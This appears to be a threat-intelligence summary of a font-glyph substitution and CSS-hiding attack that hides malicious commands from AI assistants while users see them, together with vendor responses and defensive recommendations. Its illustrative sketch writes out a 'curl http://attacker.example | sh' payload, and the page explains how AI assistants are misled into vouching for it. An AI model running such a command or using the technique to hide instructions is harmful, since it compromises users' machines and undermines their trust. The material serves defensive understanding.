Font-rendering spoofing bypasses AI assistant input validation via glyph substitution
Summary
A novel attack abuses font rendering and CSS to display malicious commands to end users while hiding them from AI assistants, enabling social-engineering-driven command execution. Attackers encode malicious instructions via custom glyph mappings and conceal the true page text with CSS (extreme font size, foreground/background color matching, or near-zero opacity), so the payload is invisible to text-based AI parsers yet renders clearly to users. Users visiting a malicious page are tricked into executing the hidden payload (e.g., reverse-shell initiation) under the guise of legitimate rewards. AI assistants analyzing only the DOM or raw HTML receive a sanitized view and incorrectly deem the instructions safe, reinforcing erroneous trust.
Timeline
- 17.03.2026 15:59 · 1 article
Font-rendering spoofing attack evades AI assistants by hiding payloads in visual layer
A browser-based attack uses custom fonts and CSS to display malicious commands to users while hiding them from AI parsers that analyze only the DOM or raw HTML. The technique was demonstrated via a proof-of-concept page promising a game easter egg, with the payload visible to the user but ignored by the AI assistant due to encoding and visual obfuscation. Vendors largely dismissed the risk as requiring social engineering, except Microsoft, which addressed the issue internally.
Sources
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
Information Snippets
- Attack leverages custom font glyph substitution to remap characters, combined with CSS techniques (color matching, extreme font size, or near-zero opacity) to visually render malicious commands while concealing them from AI assistant text parsers.
First reported: 17.03.2026 15:59 · 1 source, 1 article
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
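The glyph-substitution step can be illustrated with a minimal sketch. The payload string and the placeholder "cover" characters below are invented for illustration; a real attack ships a crafted web font whose character-to-glyph table (cmap) performs the remapping inside the browser:

```python
# Conceptual sketch of glyph substitution (illustrative only): an attacker-
# controlled font maps innocuous DOM characters to arbitrary on-screen glyphs,
# so the text an AI parser reads differs from what the user sees.
import string

# Hypothetical payload the user would see painted on screen.
payload = "curl http://attacker.example | sh"

# What the DOM actually contains: one innocuous placeholder character per
# payload glyph (here simply 'a', 'b', 'c', ...).
dom_text = string.ascii_letters[: len(payload)]

# Analogue of the custom font's character-to-glyph mapping (cmap).
cmap = dict(zip(dom_text, payload))

# A text-only parser sees dom_text; the rendered page shows the payload.
rendered = "".join(cmap[ch] for ch in dom_text)

print("AI parser sees:", dom_text)
print("User sees:     ", rendered)
```

Because the remapping lives entirely in the font file, nothing in the DOM, the HTML source, or the accessibility tree betrays the rendered payload, which is why parsers that never consult the visual layer are blind to it.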
- PoC by LayerX demonstrated successful evasion against multiple AI assistants (ChatGPT, Claude, Copilot, Gemini, Leo, Grok, Perplexity, Sigma, Dia, Fellou, Genspark) as of December 2025 via a fake Bioshock easter-egg page. The AI tools analyzed sanitized HTML, whereas the browser rendered the malicious payload to the user.
First reported: 17.03.2026 15:59 · 1 source, 1 article
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
- Microsoft addressed the issue internally after LayerX’s disclosure; Google initially accepted the report but later closed it, citing limited harm and reliance on social engineering.
First reported: 17.03.2026 15:59 · 1 source, 1 article
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
- Researchers recommend LLM vendors extend parsing to compare rendered visual output against DOM content, treat fonts as an attack surface, and scan for CSS hiding techniques such as foreground/background color parity, small fonts, and near-zero opacity.
First reported: 17.03.2026 15:59 · 1 source, 1 article
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
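The recommended scan for CSS hiding techniques could be sketched as the heuristic below. The thresholds, the inline-style-only scope, and the sample markup are assumptions for illustration; a production scanner would also resolve external stylesheets and computed styles:

```python
# Minimal heuristic scanner (illustrative sketch) flagging the three CSS
# hiding tricks named by the researchers: near-zero opacity, tiny font
# sizes, and matching foreground/background colors. Inline styles only.
import re
from html.parser import HTMLParser

class HidingDetector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, reason) pairs

    def handle_starttag(self, tag, attrs):
        style = dict(attrs).get("style", "")
        # Parse "prop: value; prop: value" declarations naively.
        decls = {}
        for d in style.split(";"):
            if ":" in d:
                k, v = d.split(":", 1)
                decls[k.strip().lower()] = v.strip().lower()

        # Heuristic 1: near-zero opacity (threshold is an assumption).
        try:
            if float(decls.get("opacity", "1")) < 0.05:
                self.findings.append((tag, "near-zero opacity"))
        except ValueError:
            pass

        # Heuristic 2: tiny font size (px values only in this sketch).
        m = re.match(r"([\d.]+)px$", decls.get("font-size", ""))
        if m and float(m.group(1)) <= 1.0:
            self.findings.append((tag, "tiny font"))

        # Heuristic 3: foreground/background color parity (exact match only).
        fg = decls.get("color")
        bg = decls.get("background-color")
        if fg and bg and fg == bg:
            self.findings.append((tag, "fg/bg color parity"))

# Sample markup (hypothetical) exercising two of the heuristics.
sample = (
    '<p style="opacity:0.01">hidden instructions</p>'
    '<span style="color:#fff;background-color:#fff">invisible</span>'
)
detector = HidingDetector()
detector.feed(sample)
print(detector.findings)
```

Comparing rendered output against DOM content, the other recommendation, is heavier-weight: it requires a headless renderer plus OCR or pixel-level diffing, which is likely why the researchers frame it as a vendor-side change rather than a client-side filter.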